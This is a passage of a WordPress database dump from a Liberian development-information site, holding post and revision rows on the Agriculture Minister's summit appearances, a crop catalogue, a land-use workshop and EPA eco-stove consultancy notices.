Senegal','','publish','open','closed','','minister-of-agriculture-jeanine-m-cooper-addresses-the-three-day-feed-africa-summit-in-dakar-senegal','','','2023-03-29 10:57:17','2023-03-29 10:57:17','',0,'https://ekmsliberia.info/?p=5320',77,'post','',0),(5321,42,'2023-03-29 10:56:11','2023-03-29 10:56:11','','MOA','','inherit','open','closed','','screenshot-2023-03-29-at-10-52-57-discover-popular-videos-facebook','','','2023-03-29 10:56:34','2023-03-29 10:56:34','',5320,'https://ekmsliberia.info/wp-content/uploads/2023/03/Screenshot-2023-03-29-at-10-52-57-Discover-Popular-Videos-Facebook.png',0,'attachment','image/png',0),(5322,42,'2023-03-29 10:57:11','2023-03-29 10:57:11','<!-- wp:paragraph -->\n<p>More than 40 Ministers of Agriculture from the African Continent were in attendance, but Liberia’s Agriculture Minister, Jeanine M. Cooper, was among the only five African Ministers of Agriculture who addressed the three-day Feed Africa Summit in Dakar, the Republic of Senegal in late January.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Akinwumi A. Adesina, President of the African Development Bank Group invited Minister Cooper to make Liberia’s <a></a>case at the Summit where 20 Heads of State including the President of Northern Ireland attended.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Summit was themed: “Food Sovereignty and Resilience” under the aegis of the African Development Bank and Government of the Republic of Senegal.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was the biggest gathering of African Ministers of Agriculture and Finance along with continental stakeholders in food and agriculture interlinking with scores of global actors.</p>\n<!-- /wp:paragraph -->','Minister of Agriculture, Jeanine M. Cooper, Addresses the Three-Day Feed Africa Summit in Dakar, Senegal','','inherit','closed','closed','','5320-revision-v1','','','2023-03-29 10:57:11','2023-03-29 10:57:11','',5320,'https://ekmsliberia.info/?p=5322',0,'revision','',0),(5323,42,'2023-02-28 10:58:00','2023-02-28 10:58:00','<!-- wp:paragraph -->\n<p>Through an invitation extended by the President of the International Fund for Agricultural Development (IFAD), Mr. Alvaro Lario, Minister Jeanine M. Cooper is attending IFAD13 Replenishment Event and the 46th Session of the IFAD Governing Council in Rome, Italy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Minister highlighted some gains made in the agricultural sector under the administration of His Excellency, <a></a>President George Manneh Weah.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As Minister of Agriculture of Liberia, Minister Cooper is concurrently a member of the IFAD Governing Council. The Council is one of the biggest gatherings of the world\'s Food and Agriculture Ministers -mostly convened in Rome, the Italian Republic, annually.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On February 14, she participated in a high-level panel discussion on “Accelerating Action for Food Security” which Honorable Jochen Flasbarth, State Secretary at the German Federal Ministry for Economic Cooperation and Development moderated. United Nations Deputy Secretary-General and Chair of the United Nations Sustainable Development Group, Ms Amina J. Mohammed joined virtually.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other members of the panel included: Her Excellency Ambassador Khadija Mohamed Al-Makhzoumi, Minister of Environment and Climate Change of the Federal Republic of Somalia; Phouthanouphet Saysombath, Deputy Minister of Finance of Lao’s People Democratic Republic and Mr. Alvaro Lario, IFAD President among others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To watch the video, please click this <em><strong><a href=\"https://web.facebook.com/watch/?v=1328446028010548\" data-type=\"URL\" data-id=\"https://web.facebook.com/watch/?v=1328446028010548\">LINK</a></strong></em> </p>\n<!-- /wp:paragraph -->','Minister Jeanine M. Cooper of MOA Attends IFAD13 Replenishment Event & the 46th Session of the IFAD Governing Council in Rome, Italy','','publish','open','closed','','minister-jeanine-m-cooper-of-moa-attends-ifad13-replenishment-event-the-46th-session-of-the-ifad-governing-council-in-rome-italy','','','2023-03-29 11:05:18','2023-03-29 11:05:18','',0,'https://ekmsliberia.info/?p=5323',76,'post','',0),(5324,42,'2023-03-29 11:04:50','2023-03-29 11:04:50','','MOA','','inherit','open','closed','','moa-6','','','2023-03-29 11:04:50','2023-03-29 11:04:50','',5323,'https://ekmsliberia.info/wp-content/uploads/2023/03/MOA.png',0,'attachment','image/png',0),(5325,42,'2023-03-29 11:05:15','2023-03-29 11:05:15','<!-- wp:paragraph -->\n<p>Through an invitation extended by the President of the International Fund for Agricultural Development (IFAD), Mr. Alvaro Lario, Minister Jeanine M. Cooper is attending IFAD13 Replenishment Event and the 46th Session of the IFAD Governing Council in Rome, Italy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Minister highlighted some gains made in the agricultural sector under the administration of His Excellency, <a></a>President George Manneh Weah.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As Minister of Agriculture of Liberia, Minister Cooper is concurrently a member of the IFAD Governing Council. The Council is one of the biggest gatherings of the world\'s Food and Agriculture Ministers -mostly convened in Rome, the Italian Republic, annually.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On February 14, she participated in a high-level panel discussion on “Accelerating Action for Food Security” which Honorable Jochen Flasbarth, State Secretary at the German Federal Ministry for Economic Cooperation and Development moderated. United Nations Deputy Secretary-General and Chair of the United Nations Sustainable Development Group, Ms Amina J. Mohammed joined virtually.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other members of the panel included: Her Excellency Ambassador Khadija Mohamed Al-Makhzoumi, Minister of Environment and Climate Change of the Federal Republic of Somalia; Phouthanouphet Saysombath, Deputy Minister of Finance of Lao’s People Democratic Republic and Mr. Alvaro Lario, IFAD President among others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To watch the video, please click this <em><strong><a href=\"https://web.facebook.com/watch/?v=1328446028010548\" data-type=\"URL\" data-id=\"https://web.facebook.com/watch/?v=1328446028010548\">LINK</a></strong></em> </p>\n<!-- /wp:paragraph -->','Minister Jeanine M. Cooper of MOA Attends IFAD13 Replenishment Event & the 46th Session of the IFAD Governing Council in Rome, Italy','','inherit','closed','closed','','5323-revision-v1','','','2023-03-29 11:05:15','2023-03-29 11:05:15','',5323,'https://ekmsliberia.info/?p=5325',0,'revision','',0),(5326,42,'2023-03-30 10:07:26','2023-03-30 10:07:26','','National Catalog of Crop Varieties Released & Registered in Liberia','','publish','closed','closed','','national-catalog-of-crop-varieties-released-registered-in-liberia','','','2023-03-30 10:07:26','2023-03-30 10:07:26','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5326',24,'document','',0),(5327,42,'2023-03-29 11:21:56','2023-03-29 11:21:56','','national crop catalog','','inherit','open','closed','','screenshot-2023-03-29-at-11-15-51-liberia-national-catalogue-of-crop-varieties-and-species-2022-pdf','','','2023-03-29 11:22:16','2023-03-29 11:22:16','',5326,'https://ekmsliberia.info/wp-content/uploads/2023/03/Screenshot-2023-03-29-at-11-15-51-Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf.png',0,'attachment','image/png',0),(5328,42,'2023-03-30 10:05:34','2023-03-30 10:05:34','','National Catalog of Crop Varieties Released & Registered in Liberia','','inherit','closed','closed','','5326-revision-v1','','','2023-03-30 10:05:34','2023-03-30 10:05:34','',5326,'https://ekmsliberia.info/?p=5328',0,'revision','',0),(5329,42,'2023-03-30 10:06:52','2023-03-30 10:06:52','','Liberia National Catalogue of Crop Varieties and Species - 2022','','inherit','open','closed','','liberia-national-catalogue-of-crop-varieties-and-species-2022','','','2023-03-30 10:06:52','2023-03-30 10:06:52','',5326,'https://ekmsliberia.info/wp-content/uploads/2023/03/Liberia-National-Catalogue-of-Crop-Varieties-and-Species-2022.pdf',0,'attachment','application/pdf',0),(5330,42,'2023-03-30 10:14:56','2023-03-30 10:14:56','<span id=\"page28R_mcid2\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Government of Liberia, through the Ministry of Agriculture, has received financing from the World </span><span dir=\"ltr\" role=\"presentation\">Bank for the implementation of the Rural Economic Transformation Project (RETRAP). The RETRAP </span><span dir=\"ltr\" role=\"presentation\">seeks</span> <span dir=\"ltr\" role=\"presentation\">to</span> <span dir=\"ltr\" role=\"presentation\">increase</span> <span dir=\"ltr\" role=\"presentation\">income</span> <span dir=\"ltr\" role=\"presentation\">of</span> <span dir=\"ltr\" role=\"presentation\">rural</span> <span dir=\"ltr\" role=\"presentation\">poor</span> <span dir=\"ltr\" role=\"presentation\">households</span> <span dir=\"ltr\" role=\"presentation\">through</span> <span dir=\"ltr\" role=\"presentation\">sustainable</span> <span dir=\"ltr\" role=\"presentation\">agricultural</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">enhancements and improved rural access and agricultural marketing infrastructure services. As its focus, </span><span dir=\"ltr\" role=\"presentation\">the project will support the</span> <span dir=\"ltr\" role=\"presentation\">Rice, Palm, Cassava,</span> <span dir=\"ltr\" role=\"presentation\">Rubber, Poultry &amp; Pig husbandry</span> <span dir=\"ltr\" role=\"presentation\">Vegetable’s</span> <span dir=\"ltr\" role=\"presentation\">value </span><span dir=\"ltr\" role=\"presentation\">chain. The project will be implemented in</span> <span dir=\"ltr\" role=\"presentation\">all the</span> <span dir=\"ltr\" role=\"presentation\">15 counties</span> <span dir=\"ltr\" role=\"presentation\">of Liberia</span> <span dir=\"ltr\" role=\"presentation\">over a period of</span> <span dir=\"ltr\" role=\"presentation\">8 years</span> <span dir=\"ltr\" role=\"presentation\">five years. </span><span dir=\"ltr\" role=\"presentation\">The project is expected to reach</span> <span dir=\"ltr\" role=\"presentation\">approximately</span> <span dir=\"ltr\" role=\"presentation\">90,000</span> <span dir=\"ltr\" role=\"presentation\">60,000 beneficiaries of which at least 50</span> <span dir=\"ltr\" role=\"presentation\">percent </span><span dir=\"ltr\" role=\"presentation\">are women.</span></span>','Rural Economic Transformation Project Integrated Pest Management Plan','','publish','closed','closed','','rural-economic-transformation-project-integrated-pest-management-plan','','','2023-03-30 10:14:56','2023-03-30 10:14:56','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5330',23,'document','',0),(5331,42,'2023-03-30 10:13:00','2023-03-30 10:13:00','','Screenshot 2023-03-30 at 10-08-23 Certified Version of RETRAP IPMP.pdf','','inherit','open','closed','','screenshot-2023-03-30-at-10-08-23-certified-version-of-retrap-ipmp-pdf','','','2023-03-30 10:13:00','2023-03-30 10:13:00','',5330,'https://ekmsliberia.info/wp-content/uploads/2023/03/Screenshot-2023-03-30-at-10-08-23-Certified-Version-of-RETRAP-IPMP.pdf.png',0,'attachment','image/png',0),(5332,42,'2023-03-30 10:13:27','2023-03-30 10:13:27','','Certified Version of RETRAP IPMP','','inherit','open','closed','','certified-version-of-retrap-ipmp','','','2023-03-30 10:13:27','2023-03-30 10:13:27','',5330,'https://ekmsliberia.info/wp-content/uploads/2023/03/Certified-Version-of-RETRAP-IPMP.pdf',0,'attachment','application/pdf',0),(5333,42,'2023-03-30 10:14:00','2023-03-30 10:14:00','<span id=\"page28R_mcid2\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Government of Liberia, through the Ministry of Agriculture, has received financing from the World </span><span dir=\"ltr\" role=\"presentation\">Bank for the implementation of the Rural Economic Transformation Project (RETRAP). The RETRAP </span><span dir=\"ltr\" role=\"presentation\">seeks</span> <span dir=\"ltr\" role=\"presentation\">to</span> <span dir=\"ltr\" role=\"presentation\">increase</span> <span dir=\"ltr\" role=\"presentation\">income</span> <span dir=\"ltr\" role=\"presentation\">of</span> <span dir=\"ltr\" role=\"presentation\">rural</span> <span dir=\"ltr\" role=\"presentation\">poor</span> <span dir=\"ltr\" role=\"presentation\">households</span> <span dir=\"ltr\" role=\"presentation\">through</span> <span dir=\"ltr\" role=\"presentation\">sustainable</span> <span dir=\"ltr\" role=\"presentation\">agricultural</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">enhancements and improved rural access and agricultural marketing infrastructure services. As its focus, </span><span dir=\"ltr\" role=\"presentation\">the project will support the</span> <span dir=\"ltr\" role=\"presentation\">Rice, Palm, Cassava,</span> <span dir=\"ltr\" role=\"presentation\">Rubber, Poultry &amp; Pig husbandry</span> <span dir=\"ltr\" role=\"presentation\">Vegetable’s</span> <span dir=\"ltr\" role=\"presentation\">value </span><span dir=\"ltr\" role=\"presentation\">chain. The project will be implemented in</span> <span dir=\"ltr\" role=\"presentation\">all the</span> <span dir=\"ltr\" role=\"presentation\">15 counties</span> <span dir=\"ltr\" role=\"presentation\">of Liberia</span> <span dir=\"ltr\" role=\"presentation\">over a period of</span> <span dir=\"ltr\" role=\"presentation\">8 years</span> <span dir=\"ltr\" role=\"presentation\">five years. </span><span dir=\"ltr\" role=\"presentation\">The project is expected to reach</span> <span dir=\"ltr\" role=\"presentation\">approximately</span> <span dir=\"ltr\" role=\"presentation\">90,000</span> <span dir=\"ltr\" role=\"presentation\">60,000 beneficiaries of which at least 50</span> <span dir=\"ltr\" role=\"presentation\">percent </span><span dir=\"ltr\" role=\"presentation\">are women.</span></span>','Rural Economic Transformation Project Integrated Pest Management Plan','','inherit','closed','closed','','5330-revision-v1','','','2023-03-30 10:14:00','2023-03-30 10:14:00','',5330,'https://ekmsliberia.info/?p=5333',0,'revision','',0),(5334,42,'2023-03-30 10:31:19','2023-03-30 10:31:19','<!-- wp:paragraph -->\n<p>The Liberia Land Authority (LLA) through the Department of Land Use and Management, with support from the Inclusive Land Administration and Management Project (ILAMP) implemented by Lantmateriet, on March 28 and 29 conducts a two-day regional training workshop in Buchanan City, Grand Bassa County under the Theme: Capacity Building at the National, Regional and Local levels.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training title “Advancing Sustainable Urbanism and Rural Development through Land Use Planning and Management” brings together stakeholders from various sector involved in urban and rural planning activities including: City Mayors, Superintendents, members of Customary Land Development and Management Committees (CLDMCs), members of Civil Society Organizations (CSOs), officials of Liberia Land Authority County Land Offices as well as technicians of the LLA Land Use and Management Department.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop is intended to educate participants on four (4) legal instruments that were developed by the LLA which include:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A) The National Land Use and Management Policy,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>B) Urban Zoning of (land uses) regulations,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>C) The Participatory Land Use Planning Guidelines, and</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>D) The Framework for Rural Land Use regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The above-mentioned instruments will be used to regulate the location and uses of land, the nature and the extent of the uses of land in accordance with a comprehensive plan for the purpose of promoting health, safety, sustainability and general wellbeing of the citizens of the Republic of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In attendance at the training workshop were Hon. Wilfred D. Myres who represented the office of the Honorable Mayor of the City of Buchana, Grand Bassa and Mr. Sam F. Kpakio, Director of Land Use and Management of the LLA who gives special remarks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Lastly, the LLA Commissioner for Land Use and Management Department, Hon. Ellen O. Pratt did the overview of the training followed by training presentations.</p>\n<!-- /wp:paragraph -->','LLA Conducts Two-Day Regional Training Workshop in Buchanan, Grand Bassa County','','publish','open','closed','','lla-conducts-two-day-regional-training-workshop-in-buchanan-grand-bassa-county','','','2023-03-30 10:31:21','2023-03-30 10:31:21','',0,'https://ekmsliberia.info/?p=5334',75,'post','',0),(5335,42,'2023-03-30 10:29:54','2023-03-30 10:29:54','<!-- wp:paragraph -->\n<p>The Liberia Land Authority (LLA) through the Department of Land Use and Management, with support from the Inclusive Land Administration and Management Project (ILAMP) implemented by Lantmateriet, on March 28 and 29 conducts a two-day regional training workshop in Buchanan City, Grand Bassa County under the Theme: Capacity Building at the National, Regional and Local levels.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training title “Advancing Sustainable Urbanism and Rural Development through Land Use Planning and Management” brings together stakeholders from various sector involved in urban and rural planning activities including: City Mayors, Superintendents, members of Customary Land Development and Management Committees (CLDMCs), members of Civil Society Organizations (CSOs), officials of Liberia Land Authority County Land Offices as well as technicians of the LLA Land Use and Management Department.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop is intended to educate participants on four (4) legal instruments that were developed by the LLA which include:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A) The National Land Use and Management Policy,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>B) Urban Zoning of (land uses) regulations,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>C) The Participatory Land Use Planning Guidelines, and</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>D) The Framework for Rural Land Use regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The above-mentioned instruments will be used to regulate the location and uses of land, the nature and the extent of the uses of land in accordance with a comprehensive plan for the purpose of promoting health, safety, sustainability and general wellbeing of the citizens of the Republic of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In attendance at the training workshop were Hon. Wilfred D. Myres who represented the office of the Honorable Mayor of the City of Buchana, Grand Bassa and Mr. Sam F. Kpakio, Director of Land Use and Management of the LLA who gives special remarks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Lastly, the LLA Commissioner for Land Use and Management Department, Hon. Ellen O. Pratt did the overview of the training followed by training presentations.</p>\n<!-- /wp:paragraph -->','LLA Conducts Two-Day Regional Training Workshop in Buchanan, Grand Bassa County','','inherit','closed','closed','','5334-revision-v1','','','2023-03-30 10:29:54','2023-03-30 10:29:54','',5334,'https://ekmsliberia.info/?p=5335',0,'revision','',0),(5336,42,'2023-03-30 10:31:02','2023-03-30 10:31:02','','lla','','inherit','open','closed','','lla-6','','','2023-03-30 10:31:02','2023-03-30 10:31:02','',5334,'https://ekmsliberia.info/wp-content/uploads/2023/03/lla-2.jpg',0,'attachment','image/jpeg',0),(5337,42,'2023-04-05 08:59:11','2023-04-05 08:59:11','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency to train 45 women from Bong, Margibi and Grand Bassa Counties in eco-stove production and group into small scale enterprises for production and sales of eco-stove (produce 450 stoves). Clean and reliable energy makes life better. Clean and reliable energy help to reduced Carbon dioxide emissions, improved health resulting from reduced indoor air pollution, create employment opportunities such as stove manufacturing, distribution, solar assembly etc. Eco-stove provides an affordable alternative to gas and electronic stoves yet maintaining the same technological advantages.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-to-train-in-Eco-stoves-Production-and-Use.pdf\" target=\"_blank\" rel=\"noopener\">National CSO / Firm Consultancy Service</a></strong></em>','National CSO / Firm Consultancy Service to Train 45 Women in Eco-Stove Production','','publish','closed','closed','','national-cso-firm-consultancy-service','','','2023-04-05 12:45:40','2023-04-05 12:45:40','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5337',62,'ekms_bulletin','',0),(5338,42,'2023-04-05 08:58:37','2023-04-05 08:58:37','','EPA Terms of Reference to train in Eco-stoves Production and Use','','inherit','open','closed','','epa-terms-of-reference-to-train-in-eco-stoves-production-and-use','','','2023-04-05 08:58:37','2023-04-05 08:58:37','',0,'https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-to-train-in-Eco-stoves-Production-and-Use.pdf',0,'attachment','application/pdf',0),(5339,42,'2023-04-05 08:58:45','2023-04-05 08:58:45','','EPA Terms of Reference for HACT Validation & Training','','inherit','open','closed','','epa-terms-of-reference-for-hact-validation-training','','','2023-04-05 08:58:45','2023-04-05 08:58:45','',0,'https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-for-HACT-Validation-Training.pdf',0,'attachment','application/pdf',0),(5340,42,'2023-04-05 08:59:11','2023-04-05 08:59:11','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency to train 45 women from Bong, Margibi and Grand Bassa Counties in eco-stove production and group into small scale enterprises for production and sales of eco-stove (produce 450 stoves). Clean and reliable energy makes life better. Clean and reliable energy help to reduced Carbon dioxide emissions, improved health resulting from reduced indoor air pollution, create employment opportunities such as stove manufacturing, distribution, solar assembly etc. Eco-stove provides an affordable alternative to gas and electronic stoves yet maintaining the same technological advantages.','National CSO / Firm Consultancy Service','','inherit','closed','closed','','5337-revision-v1','','','2023-04-05 08:59:11','2023-04-05 08:59:11','',5337,'https://ekmsliberia.info/?p=5340',0,'revision','',0),(5341,42,'2023-04-05 09:00:34','2023-04-05 09:00:34','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency to train 45 women from Bong, Margibi and Grand Bassa Counties in eco-stove production and group into small scale enterprises for production and sales of eco-stove (produce 450 stoves). Clean and reliable energy makes life better. Clean and reliable energy help to reduced Carbon dioxide emissions, improved health resulting from reduced indoor air pollution, create employment opportunities such as stove manufacturing, distribution, solar assembly etc. Eco-stove provides an affordable alternative to gas and electronic stoves yet maintaining the same technological advantages.\n\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-to-train-in-Eco-stoves-Production-and-Use.pdf\" target=\"_blank\" rel=\"noopener\">National CSO / Firm Consultancy Service</a></strong></em>','National CSO / Firm Consultancy Service','','inherit','closed','closed','','5337-autosave-v1','','','2023-04-05 09:00:34','2023-04-05 09:00:34','',5337,'https://ekmsliberia.info/?p=5341',0,'revision','',0),(5342,42,'2023-04-05 09:00:42','2023-04-05 09:00:42','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency to train 45 women from Bong, Margibi and Grand Bassa Counties in eco-stove production and group into small scale enterprises for production and sales of eco-stove (produce 450 stoves). Clean and reliable energy makes life better. Clean and reliable energy help to reduced Carbon dioxide emissions, improved health resulting from reduced indoor air pollution, create employment opportunities such as stove manufacturing, distribution, solar assembly etc. Eco-stove provides an affordable alternative to gas and electronic stoves yet maintaining the same technological advantages.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-to-train-in-Eco-stoves-Production-and-Use.pdf\" target=\"_blank\" rel=\"noopener\">National CSO / Firm Consultancy Service</a></strong></em>','National CSO / Firm Consultancy Service','','inherit','closed','closed','','5337-revision-v1','','','2023-04-05 09:00:42','2023-04-05 09:00:42','',5337,'https://ekmsliberia.info/?p=5342',0,'revision','',0),(5343,42,'2023-04-05 09:06:00','2023-04-05 09:06:00','The Environmental Protection Agency of Liberia is the statutory authority in Liberia to handle all environmental matters. In doing so, the EPA works with other key environmental institutions to carry out its mandates as well as working with the general population of Liberia for the protection, management and conservation of the natural environment of the country for the generation today as well as the generation tomorrow. To strengthen its regulatory roles, and to enhance its institutional capacity, the EPA hire a national consultant to develop four instruments for its administration. Those instruments include: (1) Program Delivery Frameworks, (2) Monitoring and Evaluation Policy, (3) Personnel Appraisal System and (4) Institutional Training Policy. As indicated above, these tasks were intended to address the Harmonized Approach to Cash Transfers (HACT) Audit Recommendations. The HACT framework represents a common operational framework for transferring cash to government and non-governmental Implementing Partners (IPs).\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-for-HACT-Validation-Training.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant / Firm Wanted</a></strong></em>','National Consultant / Firm Wanted to Provide Capacity Building Support to the EPA','','publish','closed','closed','','national-consultant-firm-wanted-to-provide-capacity-building-support-to-the-epa','','','2023-04-05 09:06:00','2023-04-05 09:06:00','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5343',61,'ekms_bulletin','',0),(5344,42,'2023-04-05 09:06:00','2023-04-05 09:06:00','The Environmental Protection Agency of Liberia is the statutory authority in Liberia to handle all environmental matters. In doing so, the EPA works with other key environmental institutions to carry out its mandates as well as working with the general population of Liberia for the protection, management and conservation of the natural environment of the country for the generation today as well as the generation tomorrow. To strengthen its regulatory roles, and to enhance its institutional capacity, the EPA hire a national consultant to develop four instruments for its administration. Those instruments include: (1) Program Delivery Frameworks, (2) Monitoring and Evaluation Policy, (3) Personnel Appraisal System and (4) Institutional Training Policy. As indicated above, these tasks were intended to address the Harmonized Approach to Cash Transfers (HACT) Audit Recommendations. The HACT framework represents a common operational framework for transferring cash to government and non-governmental Implementing Partners (IPs).\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-for-HACT-Validation-Training.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant / Firm Wanted</a></strong></em>','National Consultant / Firm Wanted to Provide Capacity Building Support to the EPA','','inherit','closed','closed','','5343-revision-v1','','','2023-04-05 09:06:00','2023-04-05 09:06:00','',5343,'https://ekmsliberia.info/?p=5344',0,'revision','',0),(5345,42,'2023-04-05 12:45:40','2023-04-05 12:45:40','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency to train 45 women from Bong, Margibi and Grand Bassa Counties in eco-stove production and group into small scale enterprises for production and sales of eco-stove (produce 450 stoves). Clean and reliable energy makes life better. Clean and reliable energy help to reduced Carbon dioxide emissions, improved health resulting from reduced indoor air pollution, create employment opportunities such as stove manufacturing, distribution, solar assembly etc. Eco-stove provides an affordable alternative to gas and electronic stoves yet maintaining the same technological advantages.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-to-train-in-Eco-stoves-Production-and-Use.pdf\" target=\"_blank\" rel=\"noopener\">National CSO / Firm Consultancy Service</a></strong></em>','National CSO / Firm Consultancy Service to Train 45 Women in Eco-Stove Production','','inherit','closed','closed','','5337-revision-v1','','','2023-04-05 12:45:40','2023-04-05 12:45:40','',5337,'https://ekmsliberia.info/?p=5345',0,'revision','',0),(5346,42,'2023-04-05 12:50:05','2023-04-05 12:50:05','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency to construct a fully functional Eco-stove center for the women of Gbarpolu County and procure initial materials for the eco-stove production. Clean and reliable energy help to reduced Carbon dioxide emissions, improved health resulting from reduced indoor air pollution, create employment opportunities such as stove manufacturing, distribution, solar assembly etc. Eco-stove provides an affordable alternative to gas and electronic stoves yet maintaining the same technological advantages.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-for-Eco-stoves-center-construction.pdf\" target=\"_blank\" rel=\"noopener\">National CSO / Firm Consultancy Service</a></em></strong>','National Specialized CSO / Firm in Eco-stove Construction and Production','','publish','closed','closed','','national-specialized-cso-firm-in-eco-stove-construction-and-production','','','2023-04-05 12:50:05','2023-04-05 12:50:05','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5346',60,'ekms_bulletin','',0),(5347,42,'2023-04-05 12:48:47','2023-04-05 12:48:47','','EPA Terms of Reference for Eco-stoves center construction','','inherit','open','closed','','epa-terms-of-reference-for-eco-stoves-center-construction','','','2023-04-05 12:48:47','2023-04-05 12:48:47','',0,'https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-for-Eco-stoves-center-construction.pdf',0,'attachment','application/pdf',0),(5348,42,'2023-04-05 12:50:05','2023-04-05 12:50:05','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency to construct a fully functional Eco-stove center for the women of Gbarpolu County and procure initial materials for the eco-stove production. Clean and reliable energy help to reduced Carbon dioxide emissions, improved health resulting from reduced indoor air pollution, create employment opportunities such as stove manufacturing, distribution, solar assembly etc. Eco-stove provides an affordable alternative to gas and electronic stoves yet maintaining the same technological advantages.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/04/EPA-Terms-of-Reference-for-Eco-stoves-center-construction.pdf\" target=\"_blank\" rel=\"noopener\">National CSO / Firm Consultancy Service</a></em></strong>','National Specialized CSO / Firm in Eco-stove Construction and Production','','inherit','closed','closed','','5346-revision-v1','','','2023-04-05 12:50:05','2023-04-05 12:50:05','',5346,'https://ekmsliberia.info/?p=5348',0,'revision','',0),(5353,42,'2023-05-22 09:08:58','2023-05-22 09:08:58','<!-- wp:paragraph -->\n<p><strong>Monrovia….</strong> Authorities of the Environmental Protection Agency (EPA) of Liberia over the weekend honored, certificated, and gowned United Nations Development Program (UNDP)’s outgoing Resident Representative Stephen Rodriques for his contributions to the environmental sector of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA Executive Director and Chief Executive Officer (CEO), Prof. Wilson K. Tarpeh presented a certificate of appreciation to Mr. Rodriques on behalf of the Board of Directors, Management, and Staff of the Agency at a dinner held in his (Rodriques) honor at Cape Hotel in Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- 